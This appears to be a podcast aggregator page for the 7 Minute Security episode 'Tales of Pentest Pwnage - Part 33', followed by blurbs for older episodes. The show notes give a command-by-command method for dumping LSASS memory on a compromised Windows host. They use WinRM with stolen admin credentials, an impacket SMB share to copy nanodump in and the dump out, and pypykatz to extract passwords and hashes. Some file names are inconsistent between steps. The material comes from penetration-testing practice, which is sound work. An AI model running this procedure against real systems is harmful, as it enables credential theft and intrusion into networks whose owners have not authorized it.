7MS #508: Tales of Pentest Pwnage - Part 33
7 Minute Security18 Feb 2022

7MS #508: Tales of Pentest Pwnage - Part 33

Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.

We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:

# Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.com\pwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\ # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log # Victim system: Get the log back to your Kali share copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\ # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt

Enjoy delicious passwords and hashes in the dump.txt file!

Avsnitt(684)

7MS #155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

7MS #155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

Here are the show notes for today: https://7ms.us/7ms-155-million-dollar-pentest-idea-notepad-tricks-and-ll-bean-jackets-for-dogs/

16 Feb 20169min

7MS #154: Friday Infosec News and Links Roundup

7MS #154: Friday Infosec News and Links Roundup

Episode show notes are here: https://7ms.us/7ms-154-friday-infosec-news-and-links-roundup/.

12 Feb 201613min

7MS #153: OFF-TOPIC - Ex Machina (and special musical guest)

7MS #153: OFF-TOPIC - Ex Machina (and special musical guest)

Today's episode is a movie review of Ex Machina (how the FRICK do you pronounce that?) and closes out with special musical guest, Sweet Surrender!

10 Feb 201611min

7MS #152: Review of the Almond 2015 Wireless Router

7MS #152: Review of the Almond 2015 Wireless Router

This is a mini-review of the Almond 2015 router by Securifi. This is NOT a paid advertisement or endorsement. I just happen to REALLY like this little router.

8 Feb 201610min

7MS #151: Friday Infosec News and Links Roundup

7MS #151: Friday Infosec News and Links Roundup

Here are some of my favorite stories and links for this week! Training opportunities NMAP course from Udemy - $24 for a limited time (I think) How to handle the the thoughtless compliance zombie hordes - by BHIS is coming up Tuesday February 16th from 2-3 ET. The price is free! Pivot Project touts itself as "a portfolio of interesting, practical, enlightening, and often challenging hands-on exercises for people who are trying to improve their mastery of important cybersecurity skills. News It is absurdly easy for attackers to destroy your Web site in 10 minutes. Secure your home network better using advice from the SANS Ouch! newsletter. Chromodo (part of Comodo's Internet Security)disables same-origin policy which basically disables Web security. Wha?! Virus total now looks at firmware images as well. We can soon wave goodbye to Java in the browser forever!. Kinda. Tools Here's a nice SSL/TLS-checking checklist for pentesters. Kali is moving to a rolling release configuration pretty soon. Update yours before April 15!

5 Feb 201611min

7MS #150: OFF-TOPIC-Bone Tomahawk / Goodnight Mommy / Comedy Loves Misery

7MS #150: OFF-TOPIC-Bone Tomahawk / Goodnight Mommy / Comedy Loves Misery

Preview16 wordsIn today's off-topic episode I review the following movies: Bone Tomahawk Goodnight Mommy Misery Loves Comedy

3 Feb 201610min

7MS #149: Securing Your Life - Part 3

7MS #149: Securing Your Life - Part 3

This episode continues the series on securing your life - making sure all the security stuff related to your life is in order. Today we're particularly focusing on preparing to travel. What if (God forbid) the plane goes down? Who has access to your money, passwords, etc.?

1 Feb 20168min

7MS #148: OFF-TOPIC - Apple Watch Review

7MS #148: OFF-TOPIC - Apple Watch Review

Yep, there are tons of people/blogs/magazines/children/pets who have provided reviews of the Apple Watch. This is mine.

28 Jan 20169min

Populärt inom Politik & nyheter

p3-krim
svd-dokumentara-berattelser-2
rss-krimstad
flashback-forever
rss-viva-fotboll
aftonbladet-daily
rss-vad-fan-hande
olyckan-inifran
rss-sanning-konsekvens
svenska-fall
krimmagasinet
rss-expressen-dok
motiv
fordomspodden
rss-frandfors-horna
svd-nyhetsartiklar
dagens-eko
blenda-2
spar
spotlight